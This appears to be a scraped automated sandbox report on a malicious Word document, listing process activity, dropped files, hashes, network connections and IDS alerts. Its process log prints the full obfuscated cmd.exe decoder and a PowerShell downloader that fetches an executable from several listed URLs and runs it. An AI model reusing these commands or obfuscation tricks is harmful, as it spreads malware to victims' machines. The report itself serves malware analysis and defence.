3976	c:\z5407\w4651\b3325\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set HBER=Uv2PfSaAEL -u/5(xND6zIhel9i7+gw:GyOC\WnbT_oJ1r@p'dK;YBc)m8,%}F{j4M$~30kZ=tsQ.&&for %x in (47,42,30,59,3,0,53,9,21,35,31,67,14,58,44,59,45,59,5,8,5,5,21,34,17,17,7,65,8,31,67,11,64,58,44,59,22,59,40,8,65,3,31,67,11,68,58,44,59,24,24,10,66,4,2,44,64,68,72,48,24,57,2,69,27,48,51,66,24,68,25,2,19,72,38,23,30,11,42,39,63,23,54,73,10,17,23,73,76,37,23,39,35,24,26,23,38,73,51,66,38,2,19,19,57,72,48,22,73,73,47,31,13,13,1,26,38,74,47,42,45,73,26,6,73,6,33,56,42,76,54,42,56,13,30,47,11,26,38,54,24,12,49,23,74,13,52,73,9,8,34,1,19,42,16,74,12,32,52,65,41,27,46,22,73,73,47,31,13,13,26,74,56,6,26,24,11,54,23,33,24,6,38,76,54,42,56,13,65,34,61,70,47,71,23,43,44,63,46,22,73,73,47,31,13,13,45,12,70,26,33,23,70,6,33,6,39,6,74,26,76,54,42,56,13,0,21,32,43,73,34,47,21,40,71,71,17,46,22,73,73,47,31,13,13,73,23,74,73,23,74,4,12,38,54,26,42,38,6,26,74,76,47,73,13,18,47,20,50,75,33,70,8,41,0,74,73,19,34,43,46,22,73,73,47,31,13,13,49,6,1,33,73,42,47,26,42,24,76,54,45,23,6,73,26,42,38,11,74,26,73,23,76,26,38,4,42,13,34,9,33,6,29,22,25,54,35,73,4,27,0,75,41,4,16,48,76,5,47,24,26,73,15,48,46,48,55,51,66,1,14,64,57,44,72,48,74,44,68,25,2,48,51,66,45,44,57,68,68,10,72,10,48,14,64,68,48,51,66,26,25,64,57,19,72,48,63,25,2,44,68,48,51,66,74,14,19,69,69,72,66,23,38,1,31,73,23,56,47,28,48,36,48,28,66,45,44,57,68,68,28,48,76,23,16,23,48,51,4,42,45,23,6,54,22,15,66,30,64,2,68,14,10,26,38,10,66,38,2,19,19,57,55,62,73,45,33,62,66,24,68,25,2,19,76,18,42,30,38,24,42,6,49,61,26,24,23,15,66,30,64,2,68,14,58,10,66,74,14,19,69,69,55,51,66,74,25,14,25,25,72,48,42,44,14,68,69,48,51,21,4,10,15,15,32,23,73,11,21,73,23,56,10,66,74,14,19,69,69,55,76,24,23,38,29,73,22,10,11,29,23,10,64,69,69,69,69,55,10,62,21,38,1,42,70,23,11,21,73,23,56,10,66,74,14,19,69,69,51,66,63,27,68,19,57,72,48,20,2,68,27,57,48,51,39,45,23,6,70,51,60,60,54,6,73,54,22,62,60,60,66,63,25,19,25,57,72,48,47,2,14,68,19,48,51,83)do set Wxc4=!Wxc4!!HBER:~%x,1!&&if %x equ 83 echo !Wxc4:*Wxc4!=!\|FOR /F "tokens=1 delims=3E.=q" %F IN ('assoc^^^\|findstr mdfi')DO %F "	c:\windows\system32\cmd.exe	—	WINWORD.EXE
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2536	CmD /V:/C"set HBER=Uv2PfSaAEL -u/5(xND6zIhel9i7+gw:GyOC\WnbT_oJ1r@p'dK;YBc)m8,%}F{j4M$~30kZ=tsQ.&&for %x in (47,42,30,59,3,0,53,9,21,35,31,67,14,58,44,59,45,59,5,8,5,5,21,34,17,17,7,65,8,31,67,11,64,58,44,59,22,59,40,8,65,3,31,67,11,68,58,44,59,24,24,10,66,4,2,44,64,68,72,48,24,57,2,69,27,48,51,66,24,68,25,2,19,72,38,23,30,11,42,39,63,23,54,73,10,17,23,73,76,37,23,39,35,24,26,23,38,73,51,66,38,2,19,19,57,72,48,22,73,73,47,31,13,13,1,26,38,74,47,42,45,73,26,6,73,6,33,56,42,76,54,42,56,13,30,47,11,26,38,54,24,12,49,23,74,13,52,73,9,8,34,1,19,42,16,74,12,32,52,65,41,27,46,22,73,73,47,31,13,13,26,74,56,6,26,24,11,54,23,33,24,6,38,76,54,42,56,13,65,34,61,70,47,71,23,43,44,63,46,22,73,73,47,31,13,13,45,12,70,26,33,23,70,6,33,6,39,6,74,26,76,54,42,56,13,0,21,32,43,73,34,47,21,40,71,71,17,46,22,73,73,47,31,13,13,73,23,74,73,23,74,4,12,38,54,26,42,38,6,26,74,76,47,73,13,18,47,20,50,75,33,70,8,41,0,74,73,19,34,43,46,22,73,73,47,31,13,13,49,6,1,33,73,42,47,26,42,24,76,54,45,23,6,73,26,42,38,11,74,26,73,23,76,26,38,4,42,13,34,9,33,6,29,22,25,54,35,73,4,27,0,75,41,4,16,48,76,5,47,24,26,73,15,48,46,48,55,51,66,1,14,64,57,44,72,48,74,44,68,25,2,48,51,66,45,44,57,68,68,10,72,10,48,14,64,68,48,51,66,26,25,64,57,19,72,48,63,25,2,44,68,48,51,66,74,14,19,69,69,72,66,23,38,1,31,73,23,56,47,28,48,36,48,28,66,45,44,57,68,68,28,48,76,23,16,23,48,51,4,42,45,23,6,54,22,15,66,30,64,2,68,14,10,26,38,10,66,38,2,19,19,57,55,62,73,45,33,62,66,24,68,25,2,19,76,18,42,30,38,24,42,6,49,61,26,24,23,15,66,30,64,2,68,14,58,10,66,74,14,19,69,69,55,51,66,74,25,14,25,25,72,48,42,44,14,68,69,48,51,21,4,10,15,15,32,23,73,11,21,73,23,56,10,66,74,14,19,69,69,55,76,24,23,38,29,73,22,10,11,29,23,10,64,69,69,69,69,55,10,62,21,38,1,42,70,23,11,21,73,23,56,10,66,74,14,19,69,69,51,66,63,27,68,19,57,72,48,20,2,68,27,57,48,51,39,45,23,6,70,51,60,60,54,6,73,54,22,62,60,60,66,63,25,19,25,57,72,48,47,2,14,68,19,48,51,83)do set Wxc4=!Wxc4!!HBER:~%x,1!&&if %x equ 83 echo !Wxc4:*Wxc4!=!\|FOR /F "tokens=1 delims=3E.=q" %F IN ('assoc^^^\|findstr mdfi')DO %F "	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
1860	C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $f2143='l8207';$l3926=new-object Net.WebClient;$n2668='http://vinsportiataymo.com/wp-includes/YtLEOv6oxsuGYM_7@http://ismail-ceylan.com/MOFkpZeJ1j@http://rukiyekayabasi.com/UIGJtOpITZZN@http://testesfuncionais.pt/DpzKQykE_Ust6OJ@http://davytopiol.creation-site.info/OLyagh9cCtf7UQ_fx'.Split('@');$v5481='s1392';$r1833 = '543';$i9486='j9213';$s5600=$env:temp+'\'+$r1833+'.exe';foreach($w4235 in $n2668){try{$l3926.DownloadFile($w4235, $s5600);$s9599='o1530';If ((Get-Item $s5600).length -ge 40000) {Invoke-Item $s5600;$j7368='z2378';break;}}catch{}}$j9698='p2536';"	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
1844	C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1 delims=3E.=q" %F IN ('assoc^\|findstr mdfi') DO %F "	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2620	C:\Windows\system32\cmd.exe /c assoc\|findstr mdfi	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2860	C:\Windows\system32\cmd.exe /S /D /c" assoc"	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2968	findstr mdfi	C:\Windows\system32\findstr.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3576	cmd	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

Add for printing

Total events

2 189

Read events

1 707

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2288	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVREC39.tmp.cvr		—
		MD5:—	SHA256:—
2288	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6F96B4B.jpg		—
		MD5:—	SHA256:—
3816	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4VFYPYU8EHQU1C6DU46V.temp		—
		MD5:—	SHA256:—
2288	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:F5BAEDB7EE75A214F9DB82C09081C1BC	SHA256:7E10CBAD76460568F638B5846F4742724B0DEF30A8D2D585CDEDC1791B831CE4
3816	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF210109.TMP		binary
		MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8	SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
2288	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd		tlb
		MD5:9BED8BD2D71B70D52C9768755252488F	SHA256:A0360F3EF2BB69BC466D8F674FBFBF82126E7117EA5394600A5466671237171F
3816	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms		binary
		MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8	SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
2888	543.exe	C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe		executable
		MD5:4B3FBC9800A4D18048CE2947E06D76A2	SHA256:5878DC59CA2A6877542AD30CAA4E6C93EEE2FC40FF0110618A42774AEB7381C1
3816	powershell.exe	C:\Users\admin\AppData\Local\Temp\543.exe		executable
		MD5:4B3FBC9800A4D18048CE2947E06D76A2	SHA256:5878DC59CA2A6877542AD30CAA4E6C93EEE2FC40FF0110618A42774AEB7381C1
2288	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\~$Scan.xml		pgc
		MD5:80A5C8E8575D13073526DA9E35C6F7E6	SHA256:28024024440321B2EBAFD8063BDA3BF8D6F55BF915E6FEFF4DA994831EA4EB68

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
3744	wabmetagen.exe	GET	—	206.248.110.184:8080	http://206.248.110.184:8080/	PR	—	—	malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
3744	wabmetagen.exe	206.248.110.184:8080	—	—	PR	malicious
3816	powershell.exe	202.182.123.178:80	vinsportiataymo.com	Managed Solutions Internet AS Internet Service Provider	AU	suspicious
3744	wabmetagen.exe	182.180.170.72:22	—	Pakistan Telecom Company Limited	PK	suspicious

DNS requests

Domain	IP	Reputation
vinsportiataymo.com	202.182.123.178	suspicious

Threats

PID	Process	Class	Message
3816	powershell.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
3816	powershell.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3816	powershell.exe	Misc activity	ET INFO EXE - Served Attached HTTP

Add for printing

No debug info

General Info

Scan

11178C0064BA44DFD44F9044027F9546

5983E8127E7CC3C0CEAC6B570532C01116FA64DB

F8CF592CF8A27ECDD9745C9B954F5AD941C8B1E39DB68422C5C54661C691668C

3072:wI8M2egvKFvvnjL/xSu90OoiLuDKZXfwKeljR1z:wJegClvnxUOmD+XfwLX

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Starts CMD.EXE for commands execution

Unusual execution from Microsoft Office

Runs app for hidden code execution

Application was dropped or rewritten from another process

Executes PowerShell scripts

SUSPICIOUS

Starts Microsoft Office Application

Starts CMD.EXE for commands execution

Application launched itself

Creates files in the user directory

Executable content was dropped or overwritten

Starts itself from another location

Connects to unusual port

INFO

Reads Microsoft Office registry keys

Creates files in the user directory

Dropped object may contain Bitcoin addresses

Malware configuration

Static information

TRiD

EXIF

XMP

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings